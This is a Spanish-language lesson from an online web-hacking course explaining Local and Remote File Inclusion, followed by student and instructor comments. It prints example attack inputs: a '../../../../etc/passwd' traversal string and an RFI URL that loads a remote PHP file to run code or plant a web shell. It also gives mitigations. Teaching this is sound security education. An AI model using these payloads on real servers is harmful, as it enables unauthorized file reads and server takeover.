Vulnerabilidades de File Inclusion: LFI y RFI

Clase 9 de 14 • Curso de Hacking: Aplicaciones Web Server Side

Resumen

¿Qué es la inclusión de archivos y cómo afecta la seguridad web?

La inclusión de archivos es una vulnerabilidad crítica en la seguridad de las aplicaciones web. Cuando no se manejan adecuadamente los parámetros de entrada, se pueden cargar archivos no deseados en el servidor. Existen dos tipos principales: Local File Inclusion (LFI) y Remote File Inclusion (RFI).

¿Cómo funciona la inclusión de archivos locales (LFI)?

El LFI permite a un atacante cargar archivos del propio servidor web. Esto se logra manipulando parámetros en la URL que especifican qué archivos cargar. En un entorno de prueba, podría estructurarse de la siguiente manera:

?page=include.php

Al modificar este parámetro, podrías intentar cargar archivos sensibles del sistema. Por ejemplo, al realizar una serie de movimientos en el directorio (utilizando ../), podrías llegar a:

../../../../etc/passwd

Esto permitiría leer el archivo passwd, que contiene información crítica sobre los usuarios del sistema.

¿Qué riesgos representa la inclusión de archivos remotos (RFI)?

A diferencia de LFI, el RFI carga archivos desde un servidor remoto. Esta vulnerabilidad es especialmente peligrosa, ya que permite al atacante introducir código adicional en la aplicación desde cualquier parte de internet. Por ejemplo, cargando un archivo desde un servidor FTP:

http://www.ejemplo.com/index.php?page=ftp://ip/direccion/archivo.php

Esto podría permitir la ejecución de código PHP malicioso si el servidor es vulnerable, facilitando acciones como la carga de una web shell.

¿Qué más se puede hacer con LFI y RFI?

LFI:
- Leer archivos de registros, como los logs de Apache.
- Obtener información confidencial, como las variables del entorno de ejecución.
RFI:
- Ejecutar scripts desde ubicaciones remotas.
- Implementar una puerta trasera mediante una web shell, facilitando el control remoto del servidor.

¿Cómo prevenir estas vulnerabilidades?

Para mitigar los riesgos asociados con LFI y RFI, se deben seguir prácticas de codificación segura:

Validación de entrada: Verificar y limitar las entradas del usuario para evitar rutas no deseadas.
Configuración del servidor: Deshabilitar la inclusión remota de archivos si no es necesaria.
Uso de filtros y sanitización: Limpiar todos los datos entrantes para reducir el riesgo de inyecciones.

La inclusión de archivos es una perspectiva poderosa para transformar el conocimiento en acción. Continuar explorando y aprendiendo es vital para mantenerse al ritmo de las amenazas de seguridad modernas. Para aquellos interesados en profundizar más, hay recursos adicionales disponibles que proporcionan análisis detallados y estudios de caso sobre estas y otras vulnerabilidades.

Carlos Andrés Sánchez

student•

Seria muy genial, un curso dedicado a este tipo de vulnerabilidades a detalle, me ha parecido muy curioso y sorprendente toda ñla información que hay en esta clase, no sabia nada de este tema y me ha gustado.

Francisco Daniel Carvajal Becerra

teacher•

Este curso es introductorio, la verdad es que espero grabar el siguiente curso el cual es el mismo título que este, pero en lugar de "Server Side" ahora sería "Client Side", posteriormente un curso de Escalada de privilegios en Aplicaciones Web el cual profundiza en estas vulnerabilidades y ya después otros cursos como Hacking Web, Avanzado.

Jefferson Pacheco Suárez

student•

Profe Francisco, toda la comunidad de Cybersec de Platzi espera a por tus nuevos cursos.

Ramiro Ezequiel Bogado

student•

me gustaría mucho que se pudieran hacer cursos más avanzados sobre Explotación que es la parte que casi nadie enseña solo se muestra la vulnerabilidad pero no a aplicarla en un pentest por ejemplo que seria un poco mi objetivo con estos cursos

Jefferson Pacheco Suárez

student•

sí, por supuesto que sería interesante tener cursos de ataques avanzados. De hecho, sería genial que platzi implementara sus propias máquinas como Hack The Boc o Try Hack Me, de esta manera las personas interesadas en cybersec, se decantarían por platzi sin más.

GUILLERMO VEGA

student•

De qué manera se puede evitar o qué se puede configurar para parchar esta vulnerabilidad? Las clases de la escuela de seguridad informática son muy buenas pero muy pocas hablan sobre cómo evitar.

Francisco Daniel Carvajal Becerra

teacher•

Hay funcionalidades que se pueden desactivar, por ejemplo en php existe allow_url_include, solo la desactivas y listo. Obvio las aplicaciones que usen esa función dejaran de funcionar.

Javier Ramos

student•

Definiciones que encontre

Local File Inclusion es una vulnerabilidad web que le permite a un atacante ejecutar código PHP por medio de un archivo almacenado en el servidor de la aplicación.

-Esta técnica consiste en incluir ficheros locales, es decir, archivos que se encuentran en el mismo servidor de la web con este tipo de fallo -a diferencia de Remote File Inclusión o inclusión de archivos remotos (RFI) que incluye archivos alojados en otros servidores. Esto se produce como consecuencia de un fallo en la programación de la página, filtrando inadecuadamente lo que se incluye al usar funciones en PHP para incluir archivos.

¿Qué peligro representa esto si solo se incluyen ficheros que estén en el mismo servidor? En un escenario como este, un atacante podría modificar los parámetros de lo que se incluye, por ejemplo, podría indicarle al sitio web que se incluyan otros archivos que también están en el servidor, comprometiendo la seguridad del mismo por completo. Un ejemplo muy claro es el archivo de contraseñas como /etc/passwd en sistemas Linux.

oscar santiago Alvarez

student•

Hola buenas tardes, Quede un poco confundido con esta tecnica. ¿ Si se sube realmente informacion o archivos al Server desde el cliente ? o** lo que se hace es mas bien mostrar archivos ocultos **que el server ya tiene, como en el File 4 Hidden? , ver el archivos passwd, Shadow o ejecutar lanzar comandos desde el cliente al server ??

Francisco Daniel Carvajal Becerra

teacher•

Local FIle inclusion carga archivos internos del mismo servidor y el RFI permite cargar archivos externos en el servidor, pero no los descarga en el mismo, solo los carga en ese momento.

Juan Carlos Medrano navarro

student•

Hola buenas noches, tengo una duda, al momento de entrar al file inclusion, no me aparecen los mismos archivos de la clase, eso es por algun error?

Francisco Daniel Carvajal Becerra

teacher•

¿Que archivos te aparecen?

Luis Alberto Santiago Hernández

student•

La vulnerabilidad Remote File Inclusion (RFI) permite cargar archivos desde una ubicación remota, pero su funcionamiento depende de la configuración del servidor y de los permisos establecidos. Si no te deja usar RFI, puede deberse a que:

Configuración del servidor: La opción allow_url_include puede estar desactivada en el archivo php.ini.
Seguridad del servidor: Muchas configuraciones de servidores están diseñadas para prevenir este tipo de ataques.

Asegúrate de tener el entorno adecuado para probar RFI y considera seguir investigando o hacer prácticas en entornos seguros diseñados para aprendizaje, como DWA.

Lucila Belen Pésaro

student•

en la seccion de recursos no hay nada. Cuales serian los recursos adicionales?

Queremos la parte avanzada!

eamedranoc1

student•

Esta practica no la pude realizar por un error en DVWA que no pude solucionar.

Dejé el nivel en LOW para poder hacer la primera practica Upload: